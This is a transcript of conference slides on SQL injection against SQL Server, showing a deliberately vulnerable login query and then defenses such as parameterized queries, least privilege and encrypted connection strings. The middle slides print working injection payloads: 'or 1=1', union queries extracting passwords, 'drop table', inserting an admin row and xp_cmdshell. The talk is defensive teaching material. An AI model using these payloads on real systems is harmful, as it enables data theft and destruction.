• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
Sql Injection
 

Sql Injection

on

  • 178 views

session at SQLSaturday #199 (Sofia, Bulgaria)

session at SQLSaturday #199 (Sofia, Bulgaria)

Statistics

Views

Total Views
178
Views on SlideShare
178
Embed Views
0

Actions

Likes
0
Downloads
1
Comments
0

0 Embeds 0

No embeds

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    Sql Injection Sql Injection Presentation Transcript

    • SQL Injection – are you ready for defense? Andrey Korshikov Krasnodar, Russia PASS Regional Mentor for Central Eastern Europe MVP, MCT, MCSE, MCITP, MCPD, MCSD .NET, MCDBA, MOS
    • Sponsors
    • Andrey Korshikov korshikov@sqlpass.org PASS Regional Mentor for Central Eastern Europe @AndreyKorshikov About me
    • About me
    • Agenda  Problem  Attack  Defense
    • Statistics • In February 2002, Jeremiah Jacks discovered that Guess.com was vulnerable to an SQL injection attack, permitting anyone able to construct a properly- crafted URL to pull down 200,000+ names, credit card numbers and expiration dates in the site's customer database. • On November 1, 2005, a teenage hacker used SQL Injection to break into the site of a Taiwanese information security magazine from the Tech Target group and steal customers' information. • On March 29, 2006, a hacker discovered an SQL Injection flaw in an official Indian government's tourism site. • On June 29, 2007, a computer criminal defaced the Microsoft UK website using SQL Injection. UK website The Register quoted a Microsoft spokesperson acknowledging the problem. • In January 2008, tens of thousands of PCs were infected by an automated SQL Injection attack that exploited a vulnerability in application code that uses Microsoft SQL Server as the database store.
    • Statistics • … • In May 2012, the website for Wurm Online, a massively multiplayer online game, was shut down from an SQL Injection while the site was being updated. • In July 2012 a hacker group was reported to have stolen 450,000 login credentials from Yahoo!. The logins were stored in plain text and were allegedly taken from a Yahoo subdomain, Yahoo! Voices. The group breached Yahoo's security by using a "union-based SQL Injection technique". • In February 2013, a group of Maldivian hackers, hacked the website " UN- Maldives" using SQL Injection.
    • SQL Injection One package of milk for 30 rubles SELECT TOP 1 productname FROM shop WHERE (type=‘milk' AND price=‘30')
    • SQL Injection One package of milk for 30 rubles or one kilogram of sweets for 200 rubles SELECT TOP 1 productname FROM shop WHERE (type=‘milk' AND price=‘30') OR (type=‘sweets' AND price='200')
    • Warning! Knowledge from my session I recommend to use only for training.
    • Dangers of SQL Injection  It is easy to study and apply  Archives of solutions http://www.exploit-db.com/  Can be automatized  Many script examples in the Network are vulnerable for attack  Does harm to the most valuable – a database
    • Dangers of SQL Injection  http://www.exploit-db.com/
    • Technical implementations  Incorrectly filtered escape characters  Incorrect type handling  UNION using  Blind SQL injection
    • Source data create table users( id int, username varchar(255), password varchar(255), privs int ) go insert into users values ( 0, 'admin', 'r00t', 0xffff ), ( 1, 'guest', 'guest', 0x0000 )
    • Application SqlCommand comm = new SqlCommand("select * from users where username = '" + txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
    • Demo
    • Application '; drop table users-- SqlCommand comm = new SqlCommand("select * from users where username = '" + txtUserName.Text + "' and password = '" + txtPassword.Text + "'");
    • Getting data Username: '; drop table temp-- Username: admin'-- Username: ' or 1=1-- Username: ' union select 1, 'fictional_user', 'some_password', 1--
    • Getting data  table name ' having 1=1--  columns name ' group by users.id having 1=1 -- ' group by users.id, users.username, users.password, users.privs having 1=1--  Type of data ' union select sum(username) from users-- ' union select sum(id) from users--
    • Getting data  add new row '; insert into users values( 666, 'attacker', 'foobar', 0xffff )--  info about system ' union select @@version,1,1,1 --  logins ' union select min(username),1,1,1 from users where username > 'a'–-  passwords ' union select password,1,1,1 from users where username = 'admin'--
    • Extended stored procedure exec master..xp_cmdshell 'net1 user' xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite xp_servicecontrol xp_availablemedia xp_dirtree xp_enumdsn xp_loginconfig xp_makecab xp_ntsec_enumdomains xp_terminate_process
    • Demo
    • WinForms
    • Demo
    • Parameters in URL
    • Defense
    • Defense  Tell to the user only that he/she really needs to know try { // Attempt some database operation } catch(Exception e) { errorLabel.Text = string.Concat("Sorry, your request failed. ", "If the problem persists please report the following message ", "to technical support", Environment.Newline, e.Message); } try { // Attempt some database operation } catch(Exception e) { int id = ErrorLogger.LogException(e); errorLabel.Text = string.Format("Sorry, your request Failed. If the problem persists please report error code {0} to the technical support team.", id); }
    • Defense  Check of all entered data  size  content of string variables  using XML-schema  decline symbols ; ' -- /* */ xp_  Use stored procedures
    • Defense  Use the parameterized input with stored procedures SqlDataAdapter myCommand = new SqlDataAdapter("LoginStoredProcedure '" + Login.Text + "'", conn);
    • Defense  Use SQL parameters of safe types SqlDataAdapter myCommand = new SqlDataAdapter("AuthorLogin", conn); myCommand.SelectCommand.CommandType = CommandType.StoredProcedure; SqlParameter parm = myCommand.SelectCommand.Parameters.Add("@ au_id", SqlDbType.VarChar, 11); parm.Value = Login.Text;
    • Defense  Pack parameters by functions QUOTENAME() and REPLACE() --before: SET @temp = 'select * from authors where au_lname=''' + @au_lname + '''‘ --after: SET @temp = 'select * from authors where au_lname=''' + REPLACE(@au_lname,'''','''''') + ''''
    • Defense  Execute with least privilege <add key="cnxNWindBad" value="server=localhost;uid=sa;pwd=;da tabase=northwind;" /> <add key="cnxNWindGood" value="server=localhost;uid=NWindReade r;pwd=utbbeesozg4d; database=northwind;" />
    • Defense  Secrets must be secrets <add key="cnxNWindBest" value="AQAAANCMnd8BFdERjHoAwE/ Cl+sBAAAAcWMZ8XhPz0O8jHcS1539LAQAAAACAAAA AAADZgAAqAAAABAAAABdodw0YhWfcC6+ UjUUOiMwAAAAAASAAACgAAAAEAAAALPzjTRnAPt7/ W8v38ikHL5IAAAAzctRyEcHxWkzxeqbq/ V9ogaSqS4UxvKC9zmrXUoJ9mwrNZ/ XZ9LgbfcDXIIAXm2DLRCGRHMtrZrp9yledz0n9kgP 3b3s+ X8wFAAAANmLu0UfOJdTc4WjlQQgmZElY7Z8" />
    • Defense  Secrets must be secrets string strCnx = SecureConnection.GetCnxString("cnxNWindBest"); public class SecureConnection { static public string GetCnxString(string configKey) { string strCnx; try { // get encrypted string from web.config string strEncryptedCnx = ConfigurationSettings.AppSettings[configKey]; // decrypt string DataProtector dp = new DataProtector(DataProtector.Store.USE_MACHINE_STORE); byte[] dataToDecrypt = Convert.FromBase64String(strEncryptedCnx); strCnx = Encoding.ASCII.GetString(dp.Decrypt(dataToDecrypt,null)); } catch { strCnx=""; } return strCnx; } } *Win32 Data Protection API (DPAPI) (System.Security.Cryptography)
    • Defense  Secrets must be secrets  EncryptByPassPhrase  DecryptByPassPhrase DECLARE @plaintext nvarchar(1000), @enc_text varbinary(2000) SET @plaintext='Я помню чудное мгновенье' SET @enc_text=ENCRYPTBYPASSPHRASE('Krasnodar',@plaintext) SELECT 'Оригинальный текст: ', @plaintext SELECT 'Зашифрованный текст:', @enc_text SELECT 'Расшифровка:', CAST(DECRYPTBYPASSPHRASE('Krasnodar',@enc_text) as nvarchar(1000))
    • Demo
    • Defense on all layers
    • Defense (conclusion)  Tell to the user only that he needs really to know  Check of all entered data  Use stored procedures  Use SQL parameters of safe types  Pack parameters by functions QUOTENAME() and REPLACE()  Execute with Least Privilege  Secrets must be secrets  Defense on all layers
    • :) http://xkcd.com/327/
    • Resources  SQL Injection  SQL Injection FAQ  Hacking website using SQL Injection - step by step guide  Dynamic SQL & SQL injection  Advanced SQL Injection In SQL Server Applications  Stop SQL Injection Attacks Before They Stop You  SQL Injection - Why I Don't Think Parameterization is Enough
    • Questions
    • Sponsors